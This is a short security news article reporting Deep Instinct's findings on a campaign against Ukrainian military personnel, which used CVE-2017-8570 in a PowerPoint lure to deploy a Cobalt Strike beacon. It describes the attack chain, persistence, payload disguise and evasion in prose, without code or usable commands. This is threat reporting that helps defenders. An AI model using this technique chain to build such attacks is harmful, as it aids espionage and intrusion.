Security experts at Deep Instinct Threat Lab have unveiled a cyber espionage campaign aimed at Ukrainian military personnel. The attackers have leveraged a Microsoft Office vulnerability, CVE-2017-8570, which has been known for nearly seven years, to deploy the post-exploitation tool Cobalt Strike. This discovery was made after a malicious PPSX file was uploaded from Ukraine to Spanish anti-virus scanning platform VirusTotal at the end of 2023, indicating a sophisticated effort to compromise military-related targets.
Technical Breakdown of the Attack
The initial phase of the attack involved a PowerPoint Slideshow file, masquerading as a US Army manual for tank mine clearing blades, which contained a remote link to an external OLE object. The use of the “script:” prefix in the file pointed to the exploitation of CVE-2017-8570, a method to bypass another vulnerability, CVE-2017-0199. The remote script, hosted on a domain protected by CloudFlare, led to a Russian VPS provider, further complicating the attack’s traceability. The second stage involved an HTML file with JavaScript code designed to ensure persistence, decode, and save the embedded payload as a seemingly innocuous Cisco AnyConnect VPN file. This payload, a dynamic-link library, was responsible for injecting Cobalt Strike Beacon into memory, awaiting further instructions from a command and control (C2) server.
Evasion Tactics and Attribution Challenges
The attackers employed a cracked version of Cobalt Strike and implemented various features to evade detection and complicate analysis by cybersecurity experts. Despite the sophisticated nature of the attack, Deep Instinct Threat Lab has not attributed it to any known threat actor. The evidence collected suggests that the sample originated from Ukraine, with the second stage hosted by a Russian VPS provider and the Cobalt beacon C&C registered in Warsaw, Poland. The choice of domain names for the attack, which appeared unrelated to military content, added an additional layer of obfuscation to the attackers’ intentions.
Last Updated on November 7, 2024 8:46 pm CET